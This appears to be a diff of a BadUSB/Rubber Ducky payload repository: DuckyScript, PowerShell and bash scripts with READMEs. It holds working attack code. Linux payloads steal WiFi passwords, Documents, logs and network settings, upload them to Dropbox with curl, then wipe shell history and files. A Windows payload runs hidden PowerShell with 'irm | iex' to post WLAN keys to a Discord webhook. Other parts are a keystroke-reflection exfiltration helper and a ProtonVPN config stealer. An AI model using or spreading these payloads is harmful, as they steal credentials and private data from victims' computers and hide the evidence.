DEFINE #ONLY_SCROLL_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) )
DEFINE #SUBMIT_FOR_CHECK WAIT_FOR_BUTTON_PRESS
FUNCTION STORAGE_PASSWORD_CHECK() FUNCTION STORAGE_PASSWORD_CHECK()
VAR $ACCEPED = FALSE VAR $ACCEPED = FALSE
LED_R LED_R
WAIT_FOR_BUTTON_PRESS #SUBMIT_FOR_CHECK
REM first combination ALL LOCKS OFF REM first combination ALL LOCKS OFF
IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN IF #ALL_LOCKS_OFF THEN
STRING . STRING .
WAIT_FOR_BUTTON_PRESS #SUBMIT_FOR_CHECK
REM second combination ONLY CAPS ON REM second combination ONLY CAPS ON
IF (($_CAPSLOCK_ON == TRUE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN IF #ONLY_CAPS_ON THEN
STRING . STRING .
WAIT_FOR_BUTTON_PRESS #SUBMIT_FOR_CHECK
REM third combination ONLY NUM ON REM third combination ONLY NUM ON
IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE)) THEN IF #ONLY_NUM_ON THEN
$ACCEPTED = TRUE $ACCEPTED = TRUE
END_IF END_IF
END_IF END_IF

View File

@ -1,41 +1,52 @@
EXTENSION TRANSLATE EXTENSION TRANSLATE
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM This extension acts as a library or collection of helper functions REM_BLOCK DOCUMENTATION
REM to work with converting variables in your payloads. This extension acts as a library or collection of helper functions
REM WHY: to work with converting variables in your payloads.
REM Of the many ways to get information about the state of your payload WHY:
REM is by injecting static strings effectively as debugging prints Of the many ways to get information about the state of your payload
REM However, given the non-static nature of payloads using variables in is by injecting static strings effectively as debugging prints
REM DuckyScript 3.0 - the ability to decode variables during payload However, given the non-static nature of payloads using variables in
REM execution and print (inject) representations of their current state DuckyScript 3.0 - the ability to decode variables during payload
REM can often be a critically helpful development and debugging tool. execution and print (inject) representations of their current state
can often be a critically helpful development and debugging tool.
REM Available Functions: Available Functions:
REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call DEFAULT:
REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call EXTENDED: (enabled using the #INCLUDE defines below):
REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
REM USAGE: USAGE:
REM set $INPUT to desired var set $INPUT to desired var
REM call the correct translate_ function for the expected data type e.g. call the correct translate_ function for the expected data type e.g.
REM VAR $myVar = 1234 VAR $myVar = 1234
REM $INPUT = $myVar $INPUT = $myVar
REM TRANSLATE_INT() TRANSLATE_INT()
REM REM the above code will inject 1234 REM the above code will inject 1234
END_REM
REM begin extension variables REM CONFIGURATION:
DEFINE PRINT_INT 0 DEFINE #INCLUDE_TRANSLATE_HEX FALSE
DEFINE PRINT_HEX 1 DEFINE #INCLUDE_TRANSLATE_BOOL FALSE
VAR $DIGIT_PRINT_MODE = PRINT_INT DEFINE #INCLUDE_TRANSLATE_BINARY FALSE
DEFINE #INCLUDE_SWAP_ENDIAN FALSE
REM Append ENTER after translation
VAR $AS_STRINGLN = TRUE
DEFINE #PRINT_INT 0
DEFINE #PRINT_HEX 1
VAR $DIGIT_PRINT_MODE = #PRINT_INT
VAR $D = 0 VAR $D = 0
VAR $IN = 0 VAR $IN = 0
VAR $INPUT = 0 VAR $INPUT = 0
VAR $MOD = 0 VAR $MOD = 0
VAR $P = FALSE VAR $P = FALSE
VAR $NL = TRUE
REM end extension variables
REM REQUIRED for INT/HEX - convert int to char REM REQUIRED for INT/HEX - convert int to char
FUNCTION PRINTDIGIT() FUNCTION PRINTDIGIT()
@ -59,7 +70,8 @@ EXTENSION TRANSLATE
STRING 8 STRING 8
ELSE IF ($D == 9) THEN ELSE IF ($D == 9) THEN
STRING 9 STRING 9
ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX
ELSE IF ($DIGIT_PRINT_MODE == #PRINT_HEX) THEN
IF ($D == 10) THEN IF ($D == 10) THEN
STRING A STRING A
ELSE IF ($D == 11) THEN ELSE IF ($D == 11) THEN
@ -73,6 +85,7 @@ EXTENSION TRANSLATE
ELSE IF ($D == 15) THEN ELSE IF ($D == 15) THEN
STRING F STRING F
END_IF END_IF
END_IF_DEFINED
ELSE ELSE
STRING ? STRING ?
END_IF END_IF
@ -91,15 +104,18 @@ EXTENSION TRANSLATE
END_IF END_IF
END_FUNCTION END_FUNCTION
IF_DEFINED_TRUE #INCLUDE_SWAP_ENDIAN
REM ENDIAN SWAPPER helper, (useful for working with VID/PID) REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
FUNCTION SWAP_ENDIAN() FUNCTION SWAP_ENDIAN()
$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00)) $INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
END_FUNCTION END_FUNCTION
END_IF_DEFINED
REM Translates a variable of presumed integer type and attempts to convert REM Translates a variable of presumed integer type and attempts to convert
REM and inject a DECIMAL string representation REM and inject a DECIMAL string representation
FUNCTION TRANSLATE_INT() FUNCTION TRANSLATE_INT()
$DIGIT_PRINT_MODE = PRINT_INT $DIGIT_PRINT_MODE = #PRINT_INT
$P = FALSE $P = FALSE
IF ( $INPUT >= 10000) THEN IF ( $INPUT >= 10000) THEN
$MOD = 10000 $MOD = 10000
@ -119,28 +135,33 @@ EXTENSION TRANSLATE
END_IF() END_IF()
$D = $INPUT $D = $INPUT
PRINTDIGIT() PRINTDIGIT()
IF $NL THEN IF $AS_STRINGLN THEN
ENTER ENTER
END_IF END_IF
END_FUNCTION END_FUNCTION
REM Translates a variable of presumed boolean type and attempts to convert REM Translates a variable of presumed boolean type and attempts to convert
REM and inject a BOOLEAN string representation REM and inject a BOOLEAN string representation
REM TO ENABLE SET INCLUDE_TRANSLATE_BOOL to TRUE before compiling
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BOOL
FUNCTION TRANSLATE_BOOL() FUNCTION TRANSLATE_BOOL()
IF $INPUT THEN IF $INPUT THEN
STRING TRUE STRING TRUE
ELSE ELSE
STRING FALSE STRING FALSE
END_IF END_IF
IF $NL THEN IF $AS_STRINGLN THEN
ENTER ENTER
END_IF END_IF
END_FUNCTION END_FUNCTION
END_IF_DEFINED
REM Translates a variable of presumed integer type and attempts to convert REM Translates a variable of presumed integer type and attempts to convert
REM and inject a HEX string representation REM and inject a HEX string representation
REM TO ENABLE SET INCLUDE_TRANSLATE_HEX to TRUE before compiling
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX
FUNCTION TRANSLATE_HEX() FUNCTION TRANSLATE_HEX()
$DIGIT_PRINT_MODE = PRINT_HEX $DIGIT_PRINT_MODE = #PRINT_HEX
VAR $chars = 0 VAR $chars = 0
VAR $d1 = 0 VAR $d1 = 0
VAR $d2 = 0 VAR $d2 = 0
@ -192,13 +213,16 @@ EXTENSION TRANSLATE
$D = $d1 $D = $d1
PRINTDIGIT() PRINTDIGIT()
END_IF END_IF
IF $NL THEN IF $AS_STRINGLN THEN
ENTER ENTER
END_IF END_IF
END_FUNCTION END_FUNCTION
END_IF_DEFINED
REM Translates a variable of presumed integer type and attempts to convert REM Translates a variable of presumed integer type and attempts to convert
REM and inject a BINARY string representation REM and inject a BINARY string representation
REM TO ENABLE SET INCLUDE_TRANSLATE_BINARY to TRUE before compiling
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BINARY
FUNCTION TRANSLATE_BINARY() FUNCTION TRANSLATE_BINARY()
VAR $I = 16 VAR $I = 16
WHILE ( $I > 0 ) WHILE ( $I > 0 )
@ -210,8 +234,9 @@ EXTENSION TRANSLATE
END_IF END_IF
$INPUT = ($INPUT << 1) $INPUT = ($INPUT << 1)
END_WHILE END_WHILE
IF $NL THEN IF $AS_STRINGLN THEN
ENTER ENTER
END_IF END_IF
END_FUNCTION END_FUNCTION
END_IF_DEFINED
END_EXTENSION END_EXTENSION

View File

@ -1,51 +1,91 @@
EXTENSION WINDOWS_HID_EXFIL EXTENSION WINDOWS_HID_EXFIL
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM Helpers for Keystroke Reflection data exfiltration REM_BLOCK DOCUMENTATION
REM This payload is a proof of concept for USB HID only Data Exfiltration Helpers for Keystroke Reflection data exfiltration
This payload is a proof of concept for USB HID only Data Exfiltration
REM TARGET: TARGET:
REM Windows Hostthat supports powershell and SendKeys Windows Host that supports powershell and SendKeys
REM USAGE: USAGE:
REM Uncomment the function call below to run this extension inline Prepare data to exfil (in filename defined by TARGET_FILE below)
REM or call RUN_EXFIL() anywhere in your payload after the extension with a powershell window already open - call RUN_WINDOWS_EXFIL()
REM DEPLOYMENT: DEPLOYMENT:
REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green. Plug Ducky into host, wait for the LED to turn (and stay) solid green.
END_REM
REM CONFIGURATION: REM CONFIGURATION:
REM File on host machine to exfil using Keystroke Reflection attack REM File on host machine to exfil
DEFINE TARGET_FILE filename.txt DEFINE #TARGET_FILE filename.txt
DEFINE #SAVE_AND_RESTORE_LOCKS TRUE
DEFINE #ENABLE_EXFIL_LEDS TRUE
DEFINE #CLOSE_AFTER_EXFIL TRUE
DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE
FUNCTION RUN_WINDOWS_EXFIL() FUNCTION RUN_WINDOWS_EXFIL()
REM Boot IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
LED_OFF
DELAY 500
REM Launch Windows RUN dialog
GUI r
DELAY 50
REM Launch powershell
STRING powershell
ENTER
DELAY 250
REM Save HOSTs current lock state
SAVE_HOST_KEYBOARD_LOCK_STATE SAVE_HOST_KEYBOARD_LOCK_STATE
REM Start Listening - Enable EXFIL mode, Enable EXFIL mode for Device LEDS END_IF_DEFINED
$_EXFIL_MODE_ENABLED = TRUE
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
LED_OFF
$_EXFIL_LEDS_ENABLED = TRUE $_EXFIL_LEDS_ENABLED = TRUE
REM Convert and reflect target file END_IF_DEFINED
STRING foreach($b in $(Get-Content "TARGET_FILE" -Encoding byte)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){If($b -band $a){$o+="%{NUMLOCK}"}Else{$o+="%{CAPSLOCK}"}}};$o+="%{SCROLLLOCK}";Add-Type -Assembly System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait("$o");exit;
$_EXFIL_MODE_ENABLED = TRUE
STRING_POWERSHELL
foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){
foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){
If($b -band $a){
$o+="%{NUMLOCK}"
}Else{
$o+="%{CAPSLOCK}"
}
}
};
$o+="%{SCROLLLOCK}";
Add-Type -Assembly System.Windows.Forms;
[System.Windows.Forms.SendKeys]::SendWait("$o");
exit;
END_STRING
IF_DEFINED_TRUE #CLOSE_AFTER_EXFIL
STRING exit;
END_IF_DEFINED
ENTER ENTER
REM Listen for EOF REM Listen for EOF
WAIT_FOR_SCROLL_CHANGE WAIT_FOR_SCROLL_CHANGE
REM Indicate SUCCESS on Device LED, Disable EXFIL mode
LED_G
$_EXFIL_MODE_ENABLED = FALSE $_EXFIL_MODE_ENABLED = FALSE
REM Restore HOSTs lock state to original
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
LED_G
END_IF_DEFINED
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
RESTORE_HOST_KEYBOARD_LOCK_STATE RESTORE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
END_FUNCTION END_FUNCTION
REM Uncomment the function call below to run this extension inline (here) IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO
REM or call RUN_WINDOWS_EXFIL() anywhere in your payload after the extension REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.
REM RUN_WINDOWS_EXFIL() REM DEMO Boot Delay
DELAY 3000
REM Open run dialog
GUI r
DELAY 500
REM Open Powershell
STRINGLN powershell
DELAY 500
REM Prepare some data in TARGET_FILE
STRINGLN echo test123 > #TARGET_FILE
DELAY 500
REM Exfil data to USB Rubber Ducky using Keystroke Reflection
RUN_WINDOWS_EXFIL()
END_IF_DEFINED
END_EXTENSION END_EXTENSION

View File

@ -0,0 +1,29 @@
# Exfiltrate WiFi Passwords - Linux ✅
A script used to exfiltrate the wifi passwords on a Linux machine.
**Category**: Exfiltrate, Credentials, Execution
## Description
A script used to exfiltrate the wifi passwords on a Linux machine.
Opens a shell, get the WiFi names, get the passwords using nmcli, send the result to Dropbox, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Dropbox Token
* Permissions
### Executing program
* Plug in your device
### Settings
* Set the Dropbox token
* Set the sudo password

View File

@ -0,0 +1,128 @@
REM #######################################################
REM # |
REM # Title : Exfiltrate Wifi Passwords - Linux |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Credentials, Execution |
REM # Target : Linux |
REM # |
REM #######################################################
REM Requirements:
REM - Permissions
REM - Internet connection
REM - Dropbox Token
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PREREQUISITES SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
REM #### ZIP SECTION ####
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home" prefix-XXXXXXXXXX)
ENTER
DELAY 500
STRING ZIP_PATH="/home/$ZIP_NAME"
ENTER
REM #### WiFi && ZIP SECTION ####
REM Get all WiFi data
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
ENTER
DELAY 500
STRING nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" -
ENTER
DELAY 500
STRING nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" -
ENTER
DELAY 500
STRING done
ENTER
DELAY 500
REM Wifi exfiltration command time - It depends
DELAY 1000
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
REM Zip operation time - It depends
DELAY 3000
REM #### EXFILTRATE SECTION ####
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
ENTER
STRING DROPBOX_FOLDER_NAME
ENTER
STRING "
ENTER
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
REM #### REMOVE TRACES ####
DELAY 2000
STRING history -c
ENTER
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
DELAY 500
STRING rm -rf "$ZIP_PATH"
ENTER
DELAY 500
STRING exit
ENTER
DELAY 500
STRING exit
ENTER

View File

@ -0,0 +1,6 @@
#!/bin/bash
for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" -
nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" -
done

View File

@ -0,0 +1,26 @@
# WLAN Windows Password - BADUSB ✅
A script used to stole target WLAN Passwords.
**Category**: WLAN, Credentials
## Description
A script used to stole target WLAN Passwords.
Opens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
Then it cleans up traces of what you have done after.
## Getting Started
### Dependencies
* An internet connection
* Windows 10,11
### Executing program
* Plug in your device
* Invoke 2 netsh commands
* Invoke-WebRequest will be entered in the Run Box to send the content

View File

@ -0,0 +1,16 @@
# ENG
netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object {
$wlan = $_.Matches.Value
$passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
$Body = @{
'username' = $env:username + " | " + [string]$wlan
'content' = [string]$passw
}
Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)
}
# Clear the PowerShell command history
Clear-History

View File

@ -0,0 +1,25 @@
REM ###################################################################
REM # |
REM # Title : WLAN-Windows-Passwords-Discord-Exfiltration |
REM # Author : Aleff |
REM # Description: A script used to stole target WLAN Passwords. |
REM # Category : Credentials |
REM # Target : Windows 10-11 |
REM # Version : 1.0 |
REM # |
REM ###################################################################
DELAY 2000
GUI r
DELAY 250
STRING powershell -w h -ep bypass $discord='
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE DISCORD example.com
STRING DISCORD
REM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1
DEFINE PAYLOAD example.com
STRINGLN ';irm PAYLOAD | iex

View File

@ -0,0 +1,28 @@
# Change MAC Address
A script used to change the MAC address on a Linux machine.
**Category**: Execution
## Description
A script used to change the MAC address on a Linux machine.
Opens a shell, get the network card name, set the new MAC address, erase traces.
## Getting Started
### Dependencies
* Linux Permissions
* Internet Connection
### Executing program
* Plug in your device
### Settings
* Set the sudo password
* Change as you want the new MAC address

View File

@ -0,0 +1,73 @@
REM ###########################################
REM # |
REM # Title : Change Linux MAC Address |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###########################################
REM Requirements:
REM - Permissions
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
REM You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### MAC SECTION ####
REM net-tools command
STRING apt install net-tools
ENTER
DELAY 2000
REM Set here your preferred MAC, you can don't change it remaining with the default value
DEFINE NEW_MAC FF:FF:FF:FF:FF:FF
REM Get the net interface name
STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
ENTER
DELAY 500
STRING ifconfig $INTERFACE down
ENTER
DELAY 500
STRING ifconfig $INTERFACE hw ether
STRING NEW_MAC
ENTER
DELAY 500
STRING ifconfig $INTERFACE up
ENTER
DELAY 500
REM #### REMOVE TRACES ####
DELAY 2000
STRING history -c
ENTER
REM Close shell
STRING exit
ENTER

View File

@ -0,0 +1,27 @@
# Change Network Configuration
A script used to change the network configuration on a Linux machine.
**Category**: Execution
## Description
A script used to change the network configuration on a Linux machine.
Opens a shel, get the network card name, set the network configuration, erase traces.
## Getting Started
### Dependencies
* Linux Permissions
### Executing program
* Plug in your device
### Settings
* Set the sudo password
* Change as you want the network configuration

View File

@ -0,0 +1,81 @@
REM ###############################################
REM # |
REM # Title : Change Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###############################################
REM Requirements:
REM - Permissions
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### IP SECTION ####
REM net-tools command
STRING apt install net-tools
ENTER
DELAY 2000
REM Set network interface
DEFINE IP 192.168.1.100
DEFINE MASK 255.255.255.0
DEFINE GATEWAY 192.168.1.1
STRING IP="
STRING IP
STRING "
ENTER
DELAY 500
STRING MASK="
STRING MASK
STRING "
ENTER
DELAY 500
STRING GATEWAY="
STRING GATEWAY
STRING "
ENTER
DELAY 500
REM Get the net interface name
STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
ENTER
DELAY 500
STRING ifconfig $INTERFACE $IP netmask $MASK up
ENTER
DELAY 500
REM #### REMOVE TRACES ####
STRING history -c
ENTER
DELAY 500
REM Close shell
STRING exit
ENTER

View File

@ -0,0 +1,32 @@
# Exfiltrate Linux Content With Dropbox - BADUSB ✅
A script used to take folder content on Linux Systems.
**Category**: Exfiltration, Execution
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
## Description
A script used to take folder content on Linux Systems.
Opens a shel, zip all zippable (R permission) content of the folder, send the zip into the dropbox folder, delete shell history.
## Getting Started
### Dependencies
* Internet Connection
* Linux System
* * Terminal that can be opened by the shortcommand CTRL-ALT t
* DropBox Account for the access token
### Executing program
* Plug in your device
### Settings
* Set your dropbox access token
* Set the folder path interessed (i.e. /Documents)
* Change (if you think that it is necessary) the delay of the zipping operation

View File

@ -0,0 +1,82 @@
REM ##########################################################
REM # |
REM # Title : Exfiltrate Linux Content With Dropbox |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ##########################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
DELAY 500
STRING path="/home/$USER_NAME/Documents"
ENTER
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
DELAY 500
STRING NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="$path/$NAME"
ENTER
DELAY 500
REM The FOLDER that you want to zip, in this example you want to zip all Documents content
STRING FOLDER="/home/$USER_NAME/Documents/"
ENTER
REM Delay for zipping operation, it depends by computer power and folder directory
DELAY 10000
DELAY 500
STRING if [ -r "$FOLDER" ]; then
ENTER
STRING zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&1
ENTER
STRING else
ENTER
STRING echo ""
ENTER
STRING fi
ENTER
DELAY 500
STRING DROPBOX_FOLDER="/$NAME"
ENTER
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
DELAY 2000
STRING history -c
ENTER

View File

@ -0,0 +1,33 @@
# Exfiltrate Linux Log Files - BADUSB ✅
A script used to take linux logs.
**Category**: Exfiltration, Execution
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
## Description
A script used to take linux logs.
Opens a shel, zip all zippable (R permission) content of the log folder, send the zip into the dropbox folder, delete tmp folder.
## Getting Started
### Dependencies
* Internet Connection
* Linux System
* * Terminal that can be opened by the shortcommand CTRL-ALT t
* DropBox Account for the access token
### Executing program
* Plug in your device
### Settings
* Set your dropbox access token
* Change if needed the folder path interessed (i.e. /var/log)
* Change (if you think that it is necessary) the delay of the zipping operation

View File

@ -0,0 +1,80 @@
REM ######################################################
REM # |
REM # Title : Exfiltrate Linux Logs With Dropbox |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ######################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
REM Required: Set here your Dropbox access TOKEN
DELAY 2000
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
REM Create random num
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
REM Folder path
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
ENTER
REM Zip path
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
ENTER
REM Default log path
DELAY 500
STRING LOG_PATH="/var/log/"
ENTER
DELAY 500
STRING zip -r "$ZIP_PATH" "$LOG_PATH"
ENTER
REM Delay of zipping operation - it depends
DELAY 10000
DELAY 500
STRING DROPBOX_FOLDER="/$ZIP_NAME"
ENTER
REM Send to Dropbox function
DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
DELAY 500
STRING curl -X POST
STRING DROPBOX_API_LINK
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
REM Send timing - it depends
DELAY 5000
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER

View File

@ -0,0 +1,27 @@
# Exfiltrate Network Configuration - Linux ✅
A script used to exfiltrate the network configuration on a Linux machine.
**Category**: Exfiltrate, Execution
## Description
A script used to exfiltrate the network configuration on a Linux machine.
Opens a shell, get the network card name, get the network configuration using nmcli, send the result to Dropbox, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Dropbox Token
### Executing program
* Plug in your device
### Settings
* Set the Dropbox token

View File

@ -0,0 +1,96 @@
REM ##########################################################
REM # |
REM # Title : Exfiltrate Linux Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ##########################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
REM DELAY 500
REM STRING USER_NAME=$(whoami)
REM ENTER
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
ENTER
REM Folder path
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
ENTER
DELAY 500
STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
ENTER
DELAY 1000
STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
ENTER
DELAY 1000
STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
ENTER
DELAY 1000
REM Delay for zipping operation, it depends by computer power and folder directory
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
DELAY 3000
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
ENTER
STRING DROPBOX_FOLDER_NAME
ENTER
STRING "
ENTER
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
DELAY 2000
STRING history -c
ENTER
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
DELAY 500
STRING rm -rf "$ZIP_PATH"
ENTER
DELAY 500
STRING exit
ENTER

View File

@ -0,0 +1,37 @@
$Path = "$Env:USERPROFILE\AppData\Local\ProtonVPN\ProtonVPN*\*\user.config"
$Content = Get-Content -Path $Path
$text = $Path + $Content
# Discord Connection
$hookurl = "$discord"
# Loop for Discord
$ConstantLimitForRestMethod = 1999
$TMP_Body = @{
'username' = $env:username
'content' = ""
}
for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
try {
$TMP_Body = @{
'username' = $env:username
'content' = $text.Substring($i, $ConstantLimitForRestMethod)
}
} catch [ArgumentOutOfRangeException] {
if($text.Length-$i -gt 0){
$TMP_Body = @{
'username' = $env:username
'content' = $text.Substring($i, $text.Length-$i)
}
} else {
break
}
}
